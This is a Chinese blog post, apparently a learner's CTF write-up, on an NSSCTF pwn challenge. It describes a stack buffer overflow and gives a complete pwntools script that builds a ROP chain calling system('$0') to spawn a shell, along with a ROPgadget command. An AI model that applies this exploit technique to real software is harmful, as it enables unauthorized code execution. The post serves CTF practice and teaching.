day5——system($0)

已于 2023-12-01 13:47:23 修改
阅读量66 收藏
点赞数
分类专栏: 精华刷题集_pwn 文章标签: 学习 安全 笔记 linux
于 2023-12-01 13:45:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73858054/article/details/134732655
版权

day5

哎呀,昨天居然忘了发了,今天先发一下吧。

shell

NSSCTF上的题,大概算是ret2text吧,关键点在于使用 system($0)

思路

有个栈不可执行保护,64位文件
在这里插入图片描述

在这里插入图片描述

逆向一下源码

溢出漏洞在read,有system函数,直接调用即可
在这里插入图片描述
但是没有‘/bin/sh’字符串,不过在上面名为tips的函数中发现了$0的机器码

在这里插入图片描述

  • 热知识:使用 system(‘/bin/sh’) 和使用 system($0) 可以达到同样的效果

system($0)system('/bin/sh')在功能上可以达到一致的效果。这是因为两者都会调用系统的shell来执行参数中指定的命令。具体来说,当你在代码中使用system($0),它会使用与运行脚本相同的shell环境来执行命令。而system('/bin/sh')则是直接调用了/bin/sh这个程序来执行参数中的命令。所以,无论是用哪种方式,最终达到的目的都是通过shell来执行特定的命令。但需要注意的是,在某些情况下,system()函数可能会存在执行失败的问题。

据此构建一条ROP链就行了

用ROPgadget找一下构建ROP链要用到的gadgets

ROPgadget --binary shell --only 'pop|rdi|ret'

在这里插入图片描述

要用gadgets片段来往system函数中传入参数(由于是64位操作系统,前六个参数放在寄存器中)

所以要用到两个片段

0x4005e3 : pop rdi ; ret
0x400416 : ret
  • 一般来说这个ret会被用来阻止程序ret时传回的参数影响后续操作,但是不知道为什么这里不能使用,使用的话无法正常执获得shell。

逻辑已经梳理清楚了,下面看脚本

from pwn import *

# sh = remote('node4.anna.nssctf.cn',28800)
sh = process('./pwn')

system_addr = 0x400557
shell_addr = 0x400541
rdi_ret = 0x4005e3
ret = 0x400416 # 这个没用到,不知道为啥我用了就会出错

payload = b'a'*0x18 +p64(rdi_ret) + p64(shell_addr) + p64(system_addr)

sh.sendafter(b'find it?',payload)
sh.interactive()
反思

做这道题的时候他那个read限制读入的长度给我整麻了,虽然这里没啥影响,但是后面还是要注意一下。

我怀疑ret那句话不能加的原因就是在这里,但是我不理解因为加上那句话之后payload的长度刚好满足0x38,很明显没有超过…

进击的萝卜君
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
System Verilog学习5——数据类型-结构体
bjc15050103的博客
12-27 1438
目录 1.struct结构体 1.1创建新类型 1.2创建不同类型的联合 1.struct结构体 1.1创建新类型 结构体struct是一个数据的集合,它是可综合的,结构可以通过模块端进行传递。 如下所示,创建一个名为pixel的无符号字节变量,分别代表红、绿和蓝, struct {bit[7:0] r,g,b;} pixel; 若要在模块和端口共享变量pixel,必须创建一个新的类型 typedef struct bit[7:0] r,g,b;} pixel_s; pixel_s
Linux高级运维: 块存储应用案例 、 分布式文件系统和对象存储 (CLUSTER—-DAY43)
01-07
———————————+++++++++++++++++++++++++++++++++++++++++++±———————- 什么是CephFS 1)分布式文件系统(Distributed File System)是指文件系统管理的物理存储资源不一定直接连接在本地节点上,而是...
【PWN · 总结】system返回shell(‘/bin/sh‘、‘sh‘、$(0))
Mr_Fmnwon的博客
05-31 2721
pwn题中要通过system/excute等返回shell,进而cat flag。今天遇到一题,参数$(0)也可返回,有必要记录一下。
苍穹外卖Day06——总结6
qq_43751200的博客
03-25 577
本篇博客主要介绍苍穹外卖项目中的Day06内容,主要介绍了HttpClient技术,方便回顾复习
Surpass Day5——Java面向对象的创建和使用
胖虎虎
01-01 246
成员/实例/对象变量、实例(对象);对象的创建和使用;
苍穹外卖day01——项目导入+环境搭建
测试
07-14 1219
这个过程主要产生两个文档,需求规格说明书,产品原型。有管理端和用户端的页面原型,具体原型看的资料里面都有加入IOC容器后会在项目运行时创建Bean对象,会执行一遍,扫描controller时会通过反射的生成对应的接口文档。静态资源映射这里会根据设置的信息动态生成一个页面。页面上的信息可以看见都是代码里面手动设置的信息,以及根据controller中的借口生成的接口文档在调试里面可以像postman一样发送请求到后端进行测试了,太强了!
Surpass Day5——Java面向对象的创建和使用,2024年最新java高级工程师面试题及答案
ULPulEMli的博客
04-20 684
new运算符在栈内存中开辟的内存空间称为对象;引用是一个变量,只不过这个变量中保存了另一个java对象的内存地址;1)与C语言中的指针不同,指针可以指向内存空间的任意一块地址。
Day16——Model处理模型数据
Android_la的博客
02-07 168
一. 回顾 前面Day15——Map处理模型数据,讲了如何使用Map处理模型数据,今天将的Model处理模型数据,用法和Map相同。 二. 例子 /** * Model 处理数据模型 */ @RequestMapping("/testModel") public String testModel(Model model) { //模型数据:loginUser = zhangsan...
Java系列教程day09——面向对象
qfliweimin的博客
07-13 1795
day09——面向对象 提纲: 1、面向对象 2、类和对象 3、方法的重载 4、构造方法 5、this关键字 6、匿名对象 7、作业 一、面向对象 1.1、生活中什么是面向对象 洗衣服,吃饭 面向过程:关注点是过程 ————站在一个执行者的角度去考虑事情,做事情 //step1.找个盆 //step2.收集要洗的衣服 //step3.放水,放洗衣粉。。 //step4:洗一洗 //step5:晒一晒 ​ 面向对象:关注点是对象 ————站在指挥者的角度 //step1:
实训day1——2024.1.22
ggcf1的博客
01-22 340
标识符和变量命名规则。
Day03——Java基本运算符、分支结构、装箱拆箱
MF956的博客
03-12 972
Day03——Java基本运算符、分支结构、装箱拆箱
闰年的计算
06-17
System.out.println(year+"年"+mouth+"月"+day+"日"); } boolean is_run() { if((year%4==0&&year0!=0)||year%400==0) return true; else return false; } } public class Date_text { public static ...
CVE-2023-28252 CLFS Windows 本地提权漏洞 POCC 源码
08-23
卡巴斯基披露该在野0day提权漏洞是一个越界写入(增量)漏洞,当目标系统试图扩展元数据块时被利用来获取system权限———Windows中最高的用户权限级别。该漏洞允许改变基础日志文件,迫使系统将基础日志文件中的假...
java经典面试2010集锦100题(不看你后悔)
02-21
—————————————————————————————————————— 题目1: 下面不属于基本类型的是:c (选择1项) A) boolean B) long C) String D) byte 题目2:d 如下程序中: (1)public class ...
可调电子时钟设计.doc
02-27
单片机综合实验课程报告 题 目 可调电子时钟设计 学生姓名 学 号 院 系 专 业 指导教师 二O一二 年 五 月 十五 日 目 录 摘要 1 关键字 1 一、可调电子时钟预期...RS状态决定了数据总线DB 0~DB7上的信号是命令还是显示
FME学习之旅---day27
summer_corner的博客
05-17 212
我们付出一些成本,时间的或者其他,最终总能收获一些什么。
使用多实例学习进行乳腺癌组织病理学图像分类和定位
qq_47896523的博客
05-16 1120
乳腺癌是女性最主要的死亡原因,病理学家根据病理切片中观察到的各种视觉特征(例如细胞核的形态特征、细胞核的微观和宏观结构等)做出决定。计算机辅助诊断(CAD)系统可以帮助病理学家自动做出决策。卷积神经网络是最广泛使用的深度学习框架,用于学习图像类别之间的复杂判别特征。多年来,VGG16 [3] 和 ResNet18 [4] 等各种 CNN 架构在海量 ImageNet 数据集上产生了出色的结果。CNN 被用于医学图像以产生最先进的结果。为图像中存在的所有类别提供了定位信息。
学习kong官方文档
好好学习日记
05-17 283
当然,我会用更简洁的方式重新解释这两个概念:Helm和Kubectl是Kubernetes生态系统中常用的两个工具,它们各自有不同的用途:
C语言查漏补缺学习【精简版】
最新发布
qq_49288362的博客
05-18 630
逗号的组合关系是自左向右,所以左边的表达式会先计算,而右边的表达式的值就留下来作为逗号运算的结果。枚举类型名字通常并不真的使用,要用的是在大括号里的名字,因为它们就是常量符合,它们的类型是int,值则一次从0到n。当要传递的参数的类型比地址大的时候,这是常用的手段:既能用比较少的字节数传递值给参数,又能避免函数对外面的变量的修改。当需要一些可以排列起来的常量值时,定义枚举的意义就是给了这些常量的值的名字。16.*:是一个单目运算符,用来访问指针的值所表示的地址上的变量。
mysql中将$[0].day 变为'$[0].day'
06-10
如果你想将字符串 $[0].day 变为 '$[0].day',可以使用单引号将其包裹,如下所示: ``` '$[0].day' ``` 如果你需要在字符串中包含单引号,你可以使用双引号将其包裹,如下所示: ``` "$[0].day" ``` 在SQL查询...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值